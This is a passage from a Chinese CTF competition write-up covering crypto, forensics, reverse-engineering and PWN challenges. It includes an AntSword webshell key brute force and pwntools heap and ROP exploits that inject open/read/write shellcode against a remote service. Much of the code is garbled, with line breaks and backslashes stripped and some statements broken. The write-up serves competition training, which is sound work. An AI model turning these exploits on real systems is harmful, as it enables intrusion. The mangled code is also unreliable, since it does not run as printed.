12828201007038003022201361213007595366913298546122923089499182187938898042596)]ct = 96910798667771988374291172958072220832574586618080134344021393928577220469428T, S, G = [M(ii) for ii in pk]F = M(F)############################################################### attackE = A*T*AdetT, detS, detG, detE, detF = A.det(), T.det(), S.det(), G.det(), E.det(), F.det()r = 2244966557637008779362441591080406338119704738381872153797151#R = 80839783875482453208291688688697485912290384775841712705111124172946909733768714734343762988749579725275997021760357500939#r = discrete_log(detG^R, ((detA^(-1)*detT).sqrt())^R, ord=(p^2-1)//R)#s = discrete_log(((detA^(-2)*detT^(-1)*detF).sqrt())^R, detG^R, ord=(p^2-1)//R)#not enough so use cado-nfs这里不够,用上cado-nfsstep2import subprocesscommand = ['./cado-nfs.py','-dlp',str(r),='+str(t1),str(p)]#1541758195020130454925136833461872657607368759409055632195831command = ['./cado-nfs.py','-dlp',str(r),='+str(t2),str(p)]#780392429787953543532147509264510635118839088869098098140941try:result = subprocess.run(command, check=True, text=True, capture_output=True)print(result.stdout)except subprocess.CalledProcessError as e:: {e.returncode}"):", e.stderr)step3#t2^s = t1Fr = GF(r)s1 = Fr(1541758195020130454925136833461872657607368759409055632195831)s2 = Fr(780392429787953543532147509264510635118839088869098098140941)ss = discrete_log(pow(t1, 6*r, p), pow(t2, 6*r, p), operation="*", ord=(p-1)//r)s = crt([int(ss), int(s1/s2)], [(p-1)//(6*r), r])ss = sfor ii in range(6):s = ss + ii * (p-1) // 6D = G^int(s)K = list(D*S*D)key = sum(K[0])+sum(K[1])+sum(K[2])mask = int(sha256(str(key).encode()).hexdigest(),16)pt = ct ^^ mask== detF):print(long_to_bytes(pt))break#QAQ~4_Br0ken_Crypto_Sy5tem~TAT
CRYPTO.05
✦✦✦ 8 ddd
操作内容:
使用工具一把梭
MISC.01
✦✦✦ 9 gza_Cracker
操作内容:
pass是Antsword
key则是在这里面
echo substr(md5($pass.$key),0,16);//前缀echo base64_encode(encode(@run($data),$key)); //加密数据echo substr(md5($pass.$key),16); //后缀
e71f50e9773b23f9 是前缀,根据这个可以爆破key
$keylist = array("123456","password","12345678","1234","admin@123","pussy","12345","dragon","qwerty","696969","mustang","letmein","baseball","master","michael","football","shadow","monkey","abc123","pass","fuckme","6969","jordan","harley","ranger","iwantu","jennifer","hunter","fuck","2000","test","batman","trustno1","thomas","tigger","robert","access","love","buster","1234567","soccer","hockey","killer","george","sexy","andrew","charlie","superman","asshole","fuckyou","dallas","jessica","panties","pepper","1111","austin","william","daniel","golfer","summer","heather","hammer","yankees","joshua","Antsw0rd","maggie","biteme","enter","ashley","thunder","cowboy","silver","richard","fucker","orange","merlin","michelle","corvette","bigdog","cheese","matthew","121212","patrick","martin","freedom","ginger","blowjob","nicole","sparky","yellow","camaro","secret","dick","falcon","taylor","111111","131313","123123","bitch","hello");$pass = "Antsword";foreach ($keylist as $key){if(substr(md5($pass.substr(md5($key), 0, 16)),0,16)=="e71f50e9773b23f9"){echo "key is: ".$key."<br>";echo "16bit: ".substr(md5($key), 0, 16);}}
key拿到即可解密:
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;}$pass='Antsword';$key = 'a18551e65c48f51e';$str = "";$data = encode(base64_decode($str), $key);echo gzdecode($data);
MISC.02
✦✦✦ 10 不良劫
操作内容:
2024 天山固网杯决赛参考链接:
https://blog.jacki.cn/2024/11/29/%E5%A4%A9%E5%B1%B1%E5%9B%BA%E7%BD%91/#CRYPTO-ddd
ps 调整色阶 将非纯黑色变得更明显
再进行定位点还原和修补
微信扫码:得到 DASCTF{014c6e74-0c4a-48fa 一半flag
使用 WaterMarkH 提取盲水印 得到第二半flag -8b33-ced16f847e39}
flag值:
DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}
MISC.03
✦✦✦ 11 马赛克
操作内容:
使用工具载入镜像
发现有个flag的压缩包。打开发现文件损坏。
还发现一个password的文件
打开后发现是图片,改后缀打开,发现密码被打马赛克。
将图片缩小,大概能猜出密码是ILIKEFORENSICS
在镜像中还发现了一个奇怪的txt文件,“打乱.txt”
导出打开后发现是加密算法
还原后,删除多余的0,使用密码解压,得到flag
```f = open('./flag.zip', 'rb').read()n = open('./new.zip', 'wb')L = len(f)for i in range(int(L/10)):n.write(f[5*i :5*i+5])n.write(f[L-5*i-5:L-5*i])```将压缩包还原```with open(r"C:UsersCrazyDesktopflag.zip",'rb') as f:tmp = f.read()L = len(tmp)print(L)o_f_zip = bytearray(L)for i in range(L//10):o_f_zip[5*i:5*i+5] = tmp[10*i:10*i+5]o_f_zip[L-5*i-5:L-5*i] = tmp[10*i+5:10*i+10]with open(r"C:UsersCrazyDesktopflag2.zip",'wb') as f2:f2.write(o_f_zip)
MISC.04
✦✦✦ 12 特殊的流量
操作内容:
找响应码为200的包,发现有一个压缩包
可以看到被替换后的密钥
看到edffd5be04cc060e343cad479a8b845c就是secret的md5hash
import hashlibimport itertools# 原始MD5哈希original_md5 = "edffd5be04cc060e343cad479a8b845c"# 替换后的密文ciphertext = "xx34d619x1brxgd9mgd4xzxwxytv669wn"# 定义替换字符集replacement_chars = ['i', '7', 'x']# 获取x的位置x_positions = [i for i, char in enumerate(ciphertext) if char == 'x']# 创建一个掩码,所有位置上的x都将被替换成1或7def generate_candidates():# 生成所有可能的替换组合for replacement in itertools.product(replacement_chars, repeat=len(x_positions)):# 将替换的字符按位置放入密文中candidate = list(ciphertext)for pos, replacement_char in zip(x_positions, replacement):candidate[pos] = replacement_charyield ''.join(candidate)# 比较每个候选密文的MD5值def crack():for candidate in generate_candidates():# 计算候选密文的MD5值candidate_md5 = hashlib.md5(candidate.encode()).hexdigest()if candidate_md5 == original_md5:print(f"Found the original ciphertext: {candidate}")return candidateprint("No match found.")return Noneif __name__ == "__main__":# 执行破解过程
爆破得明文:
i734d619i1brigd9mgd4xz7w7ytv669w
继续往下看,输出了一堆密文到flag.txt中
U2FsdGVkX18tplkP51SopY26cczUyjuT8tP9j3Ofqv5XF5njA7CygY125iYhxplSQTNoT/kcwoN1z+4a4r/+9JtONfutcHXoyCv2tLseBHr802V/RRtFaZnZc3DM/trRmjk5SAyMSgvN+laSp6uK8eAOq7yKWq7FI+En5cu+j7+bxiuceviSoJ9gEw3SfEMtz4rYbKHagq8aCAlKPEevM+HVSnGSrMoy6QS8oQPgHkafdVj2m1HmfkdQFL5q7qYvrxVlRLbm657I0VIIusf8Q6+rsvlh28HrE3MzLlu6fd/cQ7nsZKuKYo0u4pc/yvI3RZglrd7Fb6piO4ryhs2g1g==使用工具解密
可以看到非数字的英文取首字母,转换后得到flag
flag值:
DASCTF{3fd34b59-4e9d-4390-927b-1346d5364d99}
MISC.05
✦✦✦ 13 PixMatrix
操作内容:
根据题目所说, 图像进行块级转置即可
from PIL import Imageimport numpy as npdef swap_quadrants(block):"""Swaps the top-right and bottom-left quadrants of an 8x8 block.Parameters:block (numpy.ndarray): An 8x8 (or block_size x block_size) array representing theimage block.Returns:numpy.ndarray: The block with swapped quadrants."""half = block.shape[0] // 2top_right = block[:half, half:].copy()bottom_left = block[half:, :half].copy()# Swap the quadrantsblock[:half, half:] = bottom_leftblock[half:, :half] = top_rightreturn blockdef blockwise_transpose(image, block_size=8):"""Performs a block-wise transpose on the given image by swapping specific quadrantswithin each block.Parameters:image (PIL.Image.Image): The input image to be processed.block_size (int): The size of each block (default is 8).Returns:PIL.Image.Image: The transposed image."""width, height = image.sizeimage_array = np.array(image)# Handle grayscale images by ensuring consistent dimensionsif image_array.ndim == 2:image_array = image_array[:, :, np.newaxis]channels = image_array.shape[2]transposed_array = image_array.copy()for y in range(0, height, block_size):for x in range(0, width, block_size):# Extract the blockblock = image_array[y:y + block_size, x:x + block_size].copy()# Ensure the block is the correct size (it might be smaller at the edges)if block.shape[0] < block_size or block.shape[1] < block_size:continue# Swap quadrants within the blocktransposed_block = swap_quadrants(block)# Assign the transposed block back to the arraytransposed_array[y:y + block_size, x:x + block_size] = transposed_block# Remove the singleton dimension for grayscale imagesif transposed_array.shape[2] == 1:transposed_array = transposed_array.reshape((height, width))return Image.fromarray(transposed_array)def process_image(input_path, output_path, block_size=8, display=False):"""Processes the image by performing a block-wise transpose and saves the result.Parameters:input_path (str): Path to the input image.output_path (str): Path to save the transposed image.block_size (int): The size of each block (default is 8).display (bool): Whether to display the transposed image (default is False)."""try:# Open the imagewith Image.open(input_path) as img:# Perform block-wise transposetransposed_img = blockwise_transpose(img, block_size)# Save the transposed imagetransposed_img.save(output_path)print(f"Transposed image saved as {output_path}.")# Optionally display the imageif display:transposed_img.show()except Exception as e:print(f"An error occurred: {e}")if __name__ == "__main__":# Define input and output pathsinput_image_path = "PixMatrix.jpg" # Update with your image fileoutput_image_path = "transposed_image.jpg" # Update with desired output path# Process the imageprocess_image(input_image_path, output_image_path, block_size=8, display=True)
REVERSE.01
✦✦✦ 14 bouquet
操作内容:
无壳32位,题目上说有花指令,找爆红
U一下c一下nop掉再按p分析函数去花;
Shift+f12
检测到可疑字符串
我们可以使用动调检测一下,单字节比较
于是写脚本爆破
import subprocessimport timedef execute_process_with_input_data(executable_path, input_payload, timeout=10):"""启动外部程序,并通过管道与其交互,返回标准输出和错误输出。:param executable_path: 可执行文件路径:param input_payload: 传递给外部程序的输入数据:param timeout: 超时时间:return: (标准输出, 错误输出) 元组"""try:# 启动外部进程并通过管道与其交互process_handler = subprocess.Popen(executable_path,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,text=True)# 使用 communicate 方法发送输入并获取输出standard_output, error_output = process_handler.communicate(input=input_payload, timeout=timeout)return standard_output, error_outputexcept subprocess.TimeoutExpired:process_handler.kill() # 如果超时,则终止进程standard_output, error_output = process_handler.communicate()return "Execution Timed Out", error_outputdef generate_input_payload(char_array, outer_index, test_char):"""根据外部索引和字符集构建输入数据。:param char_array: 当前字符数组:param outer_index: 外部索引:param test_char: 当前测试字符:return: 构建的输入数据"""char_array[outer_index] = test_char # 修改当前字符位置return ''.join(char_array) + "n" # 构建输入数据def check_output_lines(standard_output, expected_lines):"""检查输出行数是否符合预期。:param standard_output: 外部程序的标准输出:param expected_lines: 期望的输出行数:return: 如果输出行数符合预期则返回 True,否则返回 False"""output_lines = standard_output.split("n")return len(output_lines) == expected_linesdef main():executable_path = "bouquet.exe" # 可执行文件路径char_array = ['*'] * 25 # 初始化字符数组char_set = 'j7aw_sC3addq4TAo}8_Fda{SD' # 字符集# 外层循环遍历字符位置for outer_index in range(25):# 内层循环遍历字符集for test_char in char_set:# 构建输入数据input_payload = generate_input_payload(char_array, outer_index, test_char)# 执行进程并获取输出standard_output, error_output = execute_process_with_input_data(executable_path, input_payload)# 计算期望的输出行数expected_lines = 49 - outer_index * 2# 检查输出行数是否符合预期if check_output_lines(standard_output, expected_lines):print(test_char, end="") # 如果符合条件,打印当前字符break # 退出内层循环继续下一位置的字符测试if __name__ == "__main__":main()
flag值:
DASCTF{asd48_daj7w_3adqo}
REVERSE.02
✦✦✦ 15 go_bytes
操作内容:
从题目中可以看出是go语言写的
· runtime_stringtoslicebyte() 可能是一个将字符串转换为字节切片的函数。
· 循环内部,似乎在对某些数据进行处理,通过位操作(如右移和按位或)来修改数据。这可能是对输入数据的加密或某种算法的执行。
栈空间管理:程序在开始时会检查栈是否足够,如果不足则请求更多的栈空间。
内存分配与初始化:通过 runtime_newobject() 创建新的对象,并初始化其值。
数据处理与加密:代码通过复杂的位操作对数据进行处理,可能涉及加密算法或数据转换。
数据验证:对处理后的数据进行验证,确保其符合预期。如果数据不匹配,则程序会退出并输出错误信息。
文件/流操作:在多个地方进行格式化的输入输出操作。
数据通过 v12[j] 与计算出的 main_tmp ^ v8 进行验证。如果不匹配,程序会通过 fmt_Fprintln() 打印错误信息,并调用 os_Exit(v9) 退出程序。
import binasciidef generate_calculated_values(initial_value, num_values=40, multiplier=291, addend=1110, mask=0xFFFF):"""生成一系列按给定公式计算的数值。:param initial_value: 初始值:param num_values: 要生成的数值数量:param multiplier: 乘数:param addend: 加数:param mask: 位掩码,确保结果不超过16位:return: 计算后的数值列表"""values = []current_value = initial_valuefor _ in range(num_values):current_value = (multiplier * current_value + addend) & mask # 公式计算并确保结果不超过16位values.append(current_value)return valuesdef xor_data_with_values(data, values):"""对数据进行逐元素的异或运算。:param data: 需要处理的原始数据:param values: 用于异或运算的数值列表:return: 处理后的数据列表"""return [data[i] ^ values[i] for i in range(len(data))]def modify_data_order(data):"""将数据的最后一个字节移到最前面,其他字节向后移动。:param data: 输入数据:return: 修改后的数据"""return bytes([data[-1]]) + data[:-1]def main():# 原始数据,十六进制格式hex_numbers = [0x22B9, 0x0C9F8, 0x8C89, 0x0FF18, 0x1439, 0x4E0A, 0x2A8B, 0x7CB,0x0BDEB, 0x0FAAB, 0x3FFB, 0x784B, 0x9F1E, 0x4FEB, 0x4D0B, 0x0D08E,0x38BB, 0x0CBAE, 0x0D2CE, 0x913E, 0x0A6B, 0x0F03B, 0x507B, 0x398B,0x93DE, 0x3CCE, 0x459E, 0x4ABE, 0x553E, 0x316E, 0x33BE, 0x42FE,0x0CECE, 0x4DDE, 0x982B, 0x0A31B, 0x802E, 0x12EE, 0x0F67A, 0x0EB79]# 初始值initial_value = 0xdead# 生成经过公式计算的数值calculated_values = generate_calculated_values(initial_value)# 对原始数据进行异或运算modified_numbers = xor_data_with_values(hex_numbers, calculated_values)# 将处理后的数据转换为字节流hex_data = binascii.hexlify(bytes(modified_numbers))# 将字节流最后一个字节移到最前面modified_data = modify_data_order(hex_data)# 输出结果print("Modified Data:", modified_data)# 运行主函数if __name__ == "__main__":main()
flag值:
DASCTF{faddff8cb4d711edbb2294085339ce84}
REVERSE.03
✦✦✦ 16 Zistel
操作内容:
ELF文件,拖入ida看一下
进去之后f5可以看到三行代码,可以跟进第一个函数
跟进之后看到了一个sub_10021BA函数
进去看一下
在32行那里看到了input字样
可以看出是让我们输入,目前看不出什么,我们进行ida远程调试,看一下在哪进行加密操作
这里看到了可疑的函数
里面好多内联汇编代码
初始化了寄存器和栈上的数据。
使用SIMD指令进行高效的数据存储和加载。
对输入数据进行迭代处理,可能在进行某种加密、散列或校验计算。具体的计算使用了sub_100261B函数和异或运算。
最终将计算结果存储到xmm0寄存器,并返回一个__int64类型的结果
在上一级函数中下面看到了一个dword,双击进去
怀疑是密文,继续审计
这里是一些验证,有try again和correct的字样
在这个函数中可以看出一些yihuo字节交换,和迭代处理的操作
代码:
typedef uint32_t uint32;uint32 data1[] = {0x33293158, 0x60760211, 0x42185F46, 0x63746F29};uint32 data2[] = {0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,0xBBDBD183, 0x05340F2E, 0xBEEFDEAD, 0xBBDBD183, 0x05340F2E, 0xBEEFDEAD,0xBBDBD183, 0x05340F2E};uint32 lookup_table[0x100];void byte_swap(uint32 *num) {unsigned char *byte_ptr = (unsigned char*) num;unsigned char temp;for (int i = 0; i < 2; ++i) {temp = byte_ptr[i];byte_ptr[i] = byte_ptr[3 - i];byte_ptr[3 - i] = temp;}}int main() {// 初始化 lookup_tablefor (int i = 0; i < 0x100; ++i) {lookup_table[i] = i & 3;}for (int idx = 0; idx < 4; idx += 2) {uint32 first = data1[idx];uint32 second = data1[idx + 1];for (int j = 19; j >= 0; --j) {uint32 temp = second;second ^= data2[j];for (int k = 0; k < 4; ++k) {uint8_t temp_idx = lookup_table[(data2[j] >> (k * 8)) & 0xff];uint8_t temp_val = (second >> (k * 8)) & 0xff;unsigned char second_byte_array[4];memcpy(second_byte_array, &second, sizeof(second));unsigned char tmp = second_byte_array[k];second_byte_array[k] = second_byte_array[temp_idx];second_byte_array[temp_idx] = tmp;memcpy(&second, second_byte_array, sizeof(second));}second ^= data2[j];second ^= first;first = temp;}
DASCTF{z1g_I3_S0_Coo0l!}
PWN.01
✦✦✦ 17 EZheap_2
操作内容:
Off by one漏洞,堆菜单题目,固定模板构造堆块重叠,Show能泄露pie或者堆地址,这里选择pie地址,这样就能tcachebin attack打stdout,泄露出libc地址,然后2.27orw固定模板直接梭哈
代码:
from pwn import *from struct import packfrom ctypes import *from LibcSearcher import *import base64import gmpy2li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')def s(a):p.send(a)def sa(a, b):p.sendafter(a, b)def sl(a):p.sendline(a)def sla(a, b):p.sendlineafter(a, b)def r():p.recv()def pr():print(p.recv())def rl(a):return p.recvuntil(a)def inter():p.interactive()def bug():gdb.attach(p)pause()def get_addr():return u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'x00'))def get_addr1():return u32(p.recvuntil("xf7")[-4:].ljust(4,b"x00"))def get_sb():return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/shx00'))context(os='linux', arch='amd64', log_level='debug')#p = process('./pwn')p = remote('', )elf = ELF('./pwn')#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")libc=ELF("/root/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc.so.6")def cmd(i):sla(b'Your choice:',str(i))def add(idx,size):cmd(1)sla(b'index:',str(idx))sla(b'Size:',str(size))def edit(idx,con):cmd(2)sla(b'index:',str(idx))sa(b'context:',con)def free(idx):cmd(3)sla(b'index:',str(idx))def show(idx):cmd(4)sla(b'choose:',str(idx))add(0,0x18) #0add(1,0x68) #1add(2,0x68) #2add(3,0x18) #3add(10,0x68) #2add(11,0x68) #2edit(0,b'x00'*0x18+p8(0xe1))free(1)add(4,0xd8)show(4)rl(b'n')pie=int(p.recv(14),16)-0x202160free(10)free(11)free(2)edit(4,b'a'*0x68+p64(0x71)+p64(pie+0x202020))add(5,0x68)add(6,0x68)add(7,0x68)edit(7,p64(0xfbad1800) + p64(0)*3 + b'x00')libc_base=get_addr()-0x3ed8b0li(hex(libc_base))rdi = libc_base+libc.search(asm("pop rdinret")).__next__()rsi = libc_base+libc.search(asm("pop rsinret")).__next__()rdx = libc_base+libc.search(asm("pop rdxnret")).__next__()rax = libc_base+libc.search(asm("pop raxnret")).__next__()ret = libc_base+libc.search(asm("ret")).__next__()syscall=libc_base+libc.search(asm("syscallnret")).__next__()jmp_rsp=libc_base+libc.search(asm("jmp rsp")).__next__()free_hook=libc_base+libc.sym['__free_hook']setcontext=libc_base+libc.sym['setcontext']+53open_addr=libc_base+libc.sym['open']read_addr=libc_base + libc.sym['read']write_addr=libc_base + libc.sym['write']payload=(b'x00'*0x68+p64(0)+p64(free_hook&0xfffffffffffff000)+p64(0)*2+p64(0x2000)).ljust(0xa0,b'x00')+p64(free_hook&0xfffffffffffff000)+p64(syscall)free(5)edit(4,b'x00'*0x68+p64(0x71)+p64(free_hook))add(5,0x68)add(6,0x68)edit(6,p64(setcontext))add(15,0x400)edit(15,payload)free(15)payload = p64(rdi)+p64(free_hook&0xfffffffffffff000)payload += p64(rsi)+p64(0x1000)payload += p64(rdx)+p64(7)payload += p64(rax)+p64(10)payload += p64(syscall)payload += p64(jmp_rsp)payload += asm(shellcraft.open('/flag'))payload += asm(shellcraft.read(3,free_hook+0x300,0x30))payload += asm(shellcraft.write(1,free_hook+0x300,0x30))sl(payload)inter()
flag值:
DASCTF{10737193860912531286748686403102}
PWN.02
✦✦✦ 18 Inequable Canary
操作内容:
源鲁杯原题,除了交互不一样,其他都一样
链接:
https://xz.aliyun.com/t/15840?time__1311=GqjxnDgDyC0QDsD7zG7W%3DqxWw8iVWiW4D#toc-4
代码:
from pwn import*def s(a):p.send(a)def sa(a,b):p.sendafter(a,b)def inter():p.interactive()context(log_level = 'debug',arch = 'amd64')p=remote("139.155.126.78",27641)elf=ELF('./canary')vuln=0x400820stack_fail_got=0x601038sa("Say some old spells to start the journeyn",p64(vuln))sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(stack_fail_got))sa("I have magicn",p64(0x400a5f)) #pop 3pop_rdi=0x400a63pop_rsi_r15=0x400a61read_got=0x601040write_addr=0x4006E0payload=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(write_addr)+p64(vuln)sa("Let's go!n",payload)libc_base=u64(p.recvuntil('x7f')[-6:].ljust(8, b'x00'))-0x10e1e0bss=0x601060+0x800sa("Tell me the location of the Eye of the Deep Sean",b'a'*8+p64(bss))sa("I have magicn",b'flagx00x00x00x00') #pop 3pop_rdi=0x400a63pop_rsi_r15=0x400a61read_got=0x601040write_addr=0x4006E0pop_rax=libc_base+0x36174pop_rdx_r12=libc_base+0x119431syscall_ret=libc_base+0x47656 #syscall pop_rbp retpayload=p64(pop_rdi)+p64(bss)+p64(pop_rsi_r15)+p64(0)*2+p64(pop_rax)+p64(2)+p64(syscall_ret)+p64(0) #openpayload+=p64(pop_rdi)+p64(3)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(0)+p64(syscall_ret)+p64(0)#readpayload+=p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(bss+0x100)*2+p64(pop_rdx_r12)+p64(0x100)*2+p64(pop_rax)+p64(1)+p64(syscall_ret)+p64(0)sa("Let's go!n",payload)inter()
flag值:
DASCTF{95400240268504043541865376132978}
DB.01
✦✦✦ 19 DB
操作内容:
正则匹配匹配出来
代码:
import reimport csvdef validate_phone(phone):"""Validates if a given phone number is a valid 11-digit numberand matches the specified prefixes."""valid_prefixes = ['734', '735', '736', '737', '738', '739', '747', '748', '750', '751', '752', '757', '758', '759', '772','778', '782', '783', '784', '787', '788', '795', '798', '730', '731', '732', '740', '745', '746', '755','756', '766', '767', '771', '775', '776', '785', '786', '796', '733', '749', '753', '773', '774', '777','780', '781', '789', '790', '791', '793', '799']return re.fullmatch(r'd{11}', phone) and phone[:3] in valid_prefixes# Read the data file, extract potential numbers, filter valid ones, and write to CSVwith open("a.txt", encoding="utf-8") as file:data = file.read()potential_numbers = re.findall(r'bd{11}b', data)valid_numbers = [num for num in potential_numbers if validate_phone(num)]output_data = [["category", "value"]] + [["phone", num] for num in valid_numbers]with open("output.csv", mode="w", encoding="utf-8", newline="") as csvfile:writer = csv.writer(csvfile)writer.writerows(output_data)print(f"Extracted {len(valid_numbers)} valid phone numbers. Results saved to output.csv.")
-- 结束 --
○
以上为本次比赛WP如有问题请留言私信公众号
赛事举办联系方式
联系人:张先生
VX:Evan-xuanjing
往期回顾
-天权信安网络安全团队-
网络无边 安全有界
用技术撬动未来,用奋斗描绘成功!
天权信安网络安全团队(简称“天权信安”),成立于2022年,是一支研究红蓝对抗、内网渗透、红队武器库、CTF竞赛及其网安相关活动的安全团队。这里聚集着一群有技术有担当有理想、热爱信安奉献信安的多方面专业人才。天权信安的“天权”来源于北斗七星,又称为文曲星,它代表着天资聪颖,能力超群,也象征着天权信安的高标准、高水平与高质量,体现着我们的宗旨--打造一支作风优良、实力强劲、团结协作的精英团队,用技术与毅力共同守护网络安全。目前成员 40 余人,成员也来自于黄鹤网络安全实验室,队员分布于阿尔托大学(国外)、科大、华科、电子科大、警大、江苏海洋大学、国际关系学院、广大、河北师大、吉林师大、西南石油、安工院、湖工大、华师大、湘大、湖南工程学院等国内各大高校,也分布于绿盟科技、奇安信、长亭科技、安恒信息、联通、移动等国内大厂。为“网络安全爱好者”提供一个更好的学习交流生态圈,天权信安欢迎技术大咖、攻防渗透、CTF选手等资深专业人士前来分享网络安全前沿技术、攻防实战经验、内网渗透、IOT安全、电子取证、CTF、APT、工控安全等技术,通过经验分享,来帮助大家了解最新网络安全动态,提升安全技术水平,拓宽知识领域,致力于打造一个开放共享的网络安全生态圈。
原文始发于微信公众号(天权信安):2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论